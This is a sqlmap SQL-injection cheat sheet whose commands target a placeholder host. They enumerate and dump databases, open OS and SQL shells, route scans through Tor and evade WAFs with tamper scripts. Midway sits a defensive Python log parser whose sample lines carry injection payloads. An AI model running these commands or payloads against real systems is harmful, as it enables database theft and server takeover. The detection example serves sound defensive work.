sqlmap is an open source penetration testing application that automates the detection and exploitation of SQL injection vulnerabilities as well as the takeover of database systems.
NOTE: most of the commands below pass --dbms=mysql. Omit it if you do not know the database type;
if you do know it, naming the backend is faster than letting sqlmap fingerprint it first.
— — CHEAT SHEET — —
# Enum DBs
sqlmap --dbms=mysql -u "http://takumatest.domain/" --dbs
# Enum tables
sqlmap --dbms=mysql -u "http://takumatest.domain/" -D target_DB --tables
--current-user : enum current user
--current-db : enum current DB name
# Use POST method
sqlmap --dbms=mysql -u "http://takumatest.domain/" --data="data1=aaa&data2=bbb"
# List users and roles
sqlmap --dbms=mysql -u "http://takumatest.domain/" --users --roles --threads=10
# Custom query
sqlmap --dbms=mysql -u "http://takumatest.domain/" --sql-query="select * from master.sys.server_principals"
# Dump table
sqlmap --dbms=mysql -u "http://takumatest.domain/" -D target_DB -T target_Table --dump
# List columns
sqlmap --dbms=mysql -u "http://takumatest.domain/" -D target_DB -T target_Table --columns
# Test a specific parameter
sqlmap --dbms=mysql -u "http://takumatest.domain/?param1=value1&param2=value2" --dbs -p param2
# Specify injection point in a URI path (mark it with *)
sqlmap --dbms=mysql -u "http://takumatest.domain/param1/value1*/param2/value2" --dbs
sqlmap -u 'http://takumatest.domain/' --data='param1=blah&param2=blah' --cookie='JSESSIONID=d02084cbe50e16aa4' --level=5 --risk=3 -p param1
# OS shell
sqlmap --dbms=mysql -u "http://takumatest.domain/" --os-shell
# SQL shell
sqlmap --dbms=mysql -u "http://takumatest.domain/" --sql-shell
# Single OS command
sqlmap --dbms=mysql -u "http://takumatest.domain/" --os-cmd whoami
# Query
sqlmap --dbms=mysql -u "http://takumatest.domain/" -D target_DB --sql-query "SELECT * FROM TABLE;"
# WHERE condition
sqlmap --dbms=mysql -u "http://takumatest.domain/" -D target_DB -T target_table --where "id>0"
# Scan through Tor
sqlmap -u "http://takumatest.domain/" --tor --tor-type=SOCKS5 --check-tor --dbms=mysql --dbs
# Basic auth & NTLM
sqlmap -u "http://takumatest.domain/" --data="param1=value1&param2=value2" -p param1 --auth-type=[basic/ntlm] --auth-cred=username:password
# Proxy
sqlmap -u "http://takumatest.domain/" --proxy=http://proxy_address:port
# Specific injection point (mark it with *)
sqlmap -u "http://takumatest.domain/abc/def/123*/data.php"
# Dump limit (rows)
--start=1 --stop=10
# Bypass WAF (for example)
--tamper="between,randomcase,space2comment"
# Techniques (one letter per technique; default is all)
--technique=BEUST
Stacked queries (S)
Error based (E)
Union query based (U)
Inline queries (Q)
Boolean blind (B)
Time based blind (T)
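The technique letters above map to payload families that are easy to recognise in a web server's access log, which is how a defender usually spots a sqlmap run against their own application. The following Python script is an added example, not part of the cheat sheet and not sqlmap's own code: it parses combined-format log lines, URL-decodes the request target, undoes the two simple obfuscations named in the --tamper line above (space2comment and randomcase), and tags each source IP with the technique letters (B/E/U/S/T) its requests match. The log lines, IPs and signature patterns are constructed for the demo; the signatures are illustrative, not a complete rule set. It also flags sqlmap's default User-Agent, and the lead line on --random-agent below shows why that check alone is not enough.

```python
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=1%20AND%20EXTRACTVALUE(1,version()) HTTP/1.1" 500 0 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 600 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.12 - - [01/Jan/2024:10:00:06 +0000] "GET /item?id=1/**/uNiOn/**/aLl/**/sElEcT/**/1,2 HTTP/1.1" 200 600 "-" "Mozilla/5.0 (X11)"
10.0.0.12 - - [01/Jan/2024:10:00:07 +0000] "GET /item?id=1%3B%20SELECT%20version() HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11)"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One illustrative pattern per sqlmap technique letter (constructed, not exhaustive).
# re.I also covers the randomcase tamper; the "NOT BETWEEN" branch covers the between tamper.
SIGNATURES = {
    "B": re.compile(r"\bAND\s+\d+\s*(?:=\s*\d+|NOT\s+BETWEEN\b)", re.I),  # boolean blind
    "E": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(", re.I),          # error based (MySQL)
    "U": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),               # union query
    "S": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),  # stacked queries
    "T": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),                  # time based blind
}
SQLMAP_UA_RE = re.compile(r"\bsqlmap/", re.I)  # sqlmap's default User-Agent prefix


def normalize(request_target: str) -> str:
    """URL-decode the target and collapse /**/ (space2comment tamper) back to a space."""
    return unquote_plus(request_target).replace("/**/", " ")


def classify(request_target: str) -> set[str]:
    """Return the set of technique letters whose signature matches this request target."""
    decoded = normalize(request_target)
    return {letter for letter, rx in SIGNATURES.items() if rx.search(decoded)}


def scan_log(text: str) -> dict[str, dict]:
    """Aggregate suspicious requests per source IP: technique letters, count, default-UA flag."""
    findings: dict[str, dict] = defaultdict(
        lambda: {"techniques": set(), "requests": 0, "sqlmap_ua": False}
    )
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        techs = classify(m["target"])
        ua_hit = bool(SQLMAP_UA_RE.search(m["ua"]))
        if not techs and not ua_hit:
            continue  # ordinary traffic
        rec = findings[m["ip"]]
        rec["requests"] += 1
        rec["techniques"] |= techs
        rec["sqlmap_ua"] = rec["sqlmap_ua"] or ua_hit
    return dict(findings)


if __name__ == "__main__":
    for ip, rec in scan_log(SAMPLE_LOG).items():
        print(ip, sorted(rec["techniques"]), rec["requests"], "default-UA" if rec["sqlmap_ua"] else "other-UA")
```

The second source in the sample (10.0.0.12) carries a browser User-Agent, as a run with --random-agent would, yet is still caught by the payload signatures; that is the point of matching on the decoded request rather than on the client string. Because the B and T probes produce pairs of near-identical requests with differing response sizes or latencies, the per-IP aggregation is also where a rate threshold or a response-time feature would be added in a real detector.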
# Clear cache
--fresh-queries
--flush-session
# Example command
sqlmap -r file-request.txt --random-agent --threads=10 --technique=B --level=3 --batch -D target_DB -T target_table --fresh-queries --count